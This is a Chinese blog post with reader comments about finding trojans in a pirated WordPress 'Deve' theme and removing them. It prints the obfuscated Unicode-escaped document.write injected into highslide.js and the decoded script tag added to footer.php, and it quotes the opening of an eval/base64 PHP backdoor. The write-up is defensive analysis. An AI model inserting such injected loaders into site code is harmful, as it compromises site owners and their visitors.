WordPress Deve主题被挂马


近几天突然想换主题了,就想起以前看过的Deve主题,不过貌似是收费的,我等穷学生没钱只能D版了,在此感谢主题作者!

在网上搜索下,居然在新浪爱问里提供Deve主题的下载,不过由于我使用Google搜索的,无意中看到一篇文章提到网上的Deve主题大多都带木马。这引起了我的警惕。下载后按照网上的提示,果然找到了一个问题文件,二话不说用ASC扫描了下载的压缩包后杀软提示有两处木马威胁!!唉,用了快两年的wordpress,主题居然也有人去挂马。

下面说一下如何处理:

第一处可疑点:...\Deve\functions\cache

据我查询,Deve主题应该存在此目录且为空。而下载的这份主题的这个目录下尽是乱起八糟的图片文件,如果仔细看就会发现其中暗藏一个名为“18fe3d6fd3a2f42887243b8b64b0f4a4.php”的文件,打开后发现是以“<?php eval(gzuncompress(base64_decode(...”开头的,经过Base64方法等加密处理后的PHP木马。解决方法是清空此目录即可。

第二处可疑点:...\Deve\highslide\highslide.js

打开后会发现文件开头有这么一段Unicode编码的字符串:
[html]
document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0074\u0079
\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u002F\u006A\u0061\u0076
\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u0020\u0073\u0072\u0063
\u003D\u0022\u002F\u0077\u0070\u002D\u0069\u006E\u0063\u006C\u0075\u0064
\u0065\u0073\u002F\u006A\u0073\u002F\u0074\u0069\u006E\u0079\u006D\u0063
\u0065\u002F\u0074\u0068\u0065\u006D\u0065\u0073\u002F\u006D\u0065\u006E
\u0075\u0073\u0070\u0065\u0063\u0073\u002E\u0070\u0068\u0070\u0022\u003E
\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
[/html]
而实际上源文件里根本木有这些内容,源文件是以其后的“if(!hs){var hs={lang...”打头的。

等等,我很好奇这一段的真实内容是什么,于是写了几行程序解码,发现解密的内容是:
[html]
<script type="text/javascript" src="/wp-includes/js/tinymce/themes/menuspecs.php"></script>
[/html]
而这个指示的menuspecs.php文件根本就不存在。

第三处可疑点:...\Deve\footer.php

这个不得不说,我用百度站长工具的“页面优化建议”检测主页时,发现有一项请求的返回结果是404,于是我留心看了一下到底是哪个请求,这就在此中发现了猫腻。看看最后的body闭合标签前是啥?尼玛就是上面那堆Unicode编码的字符串解密后的内容,一模一样的!
[html]
<dig><script type="text/javascript" src="/wp-includes/js/tinymce/themes/menuspecs.php"></script> </dig>
[/html]

后记

鉴于用了这个主题,故有了这篇文章,其中可能有不对的地方,敬请各路大神指点。
本人再次提醒wordpress朋友,安装主题一定要去官网下载。通过其他途径下载的一定要用杀软扫描。本人强烈建议用在线病毒扫描网www.virscan.org来进一步确认下载的文件是否安全。

27 Responses Comment (27) Trackback (0)
  1. jayroof :

    我也下载了个,也中招了,请问下删除文中提到的那些被挂马的地方,是不是可以使用了?谢谢

  2. iijjll :

    我想知道这个主题哪里能买到,很喜欢啊。网上分享的基本都是被挂了马的

  3. JV :

    主题还挂马,现在的人真是无聊,能得到什么?

  4. wayde :

    感谢博主 发漏洞 之前果断中招了~~~~感谢10M次

  5. A.yi :

    :razz: 博主,再问个问题
    你的 友情链接页面是怎么弄的?我这自带的怎么没显示呢,是不是还得插件还是怎样?(模版已选Links)

    1. SingleX Post author :

      @A.yi : 貌似是要像写文章一样手动写友链,发布 :!: :!:

      1. A.yi :

        @SingleX : 汗。。。。这么麻烦的吗,你不会是因为这个就没弄友链页面吧
        还有我那的表情也不显示,奇怪的很,本地测试的时候都是正常的。

  6. A.yi :

    能分享一份不 :o

    1. SingleX Post author :

      @A.yi : 抱歉由于小站使用的是D版,故不能传播这个。网上有提供下载的,搜索就好了。

      1. A.yi :

        @SingleX : 网上确实有,下了一份就有你说的这些,解压的时候eset竟然直接报毒了,是那个highslide.js
        但是请教下 if(!hs){var hs={lang 那段到底该不该删呢? 代码小白一枚。。。

        1. SingleX Post author :

          @A.yi : 删掉if之前的所有代码。

          1. A.yi :

            @SingleX : 嗯嗯,谢了,另找到一份,没有找到相关代码,貌似没有挂马,698K 大小

  7. tiandi :

    很感兴趣,这个没有的文件里是啥内容。。。

    1. SingleX Post author :

      @tiandi : 在网上也没找到,我也很感兴趣O(∩_∩)O哈哈~

  8. 遵超 :

    站长,能不能把你的主题给我来一份,我的老是错位不知道怎么回事?

    1. SingleX Post author :

      @遵超 : 抱歉由于小站使用的是D版,故不能传播这个。网上有提供下载的,主题不支持IE6等低版本。

  9. HDyard :

    hello,了解下,你的页面排序怎么从竖排变成横排的啊。新手求教

    1. SingleX Post author :

      @HDyard : 不知你说的“页面排序”是?菜单?这个得在后台的外观--菜单功能里,把“主题位置”保存才行

  10. HDyard :

    你的底部,recent posts recent 等等是怎么做出来的啊,初学者。。

    1. SingleX Post author :

      @HDyard : 五一回家来着,没法回复嘿嘿。底部的直接在小工具里面添加就行了。

  11. [已删除] :

    :razz: 不错哦~

  12. 沭阳博客 :

    不知道怎么修改呢?我遇到的情况和你一样的 ;-)

  13. Neysa :

    我的就中了,我还一直奇怪为啥老出来那个404 :!:

    1. SingleX Post author :

      @Neysa : 很多网友在非官方渠道下载时通常不注意去检查一下代码,很危险啊 :idea:

发表评论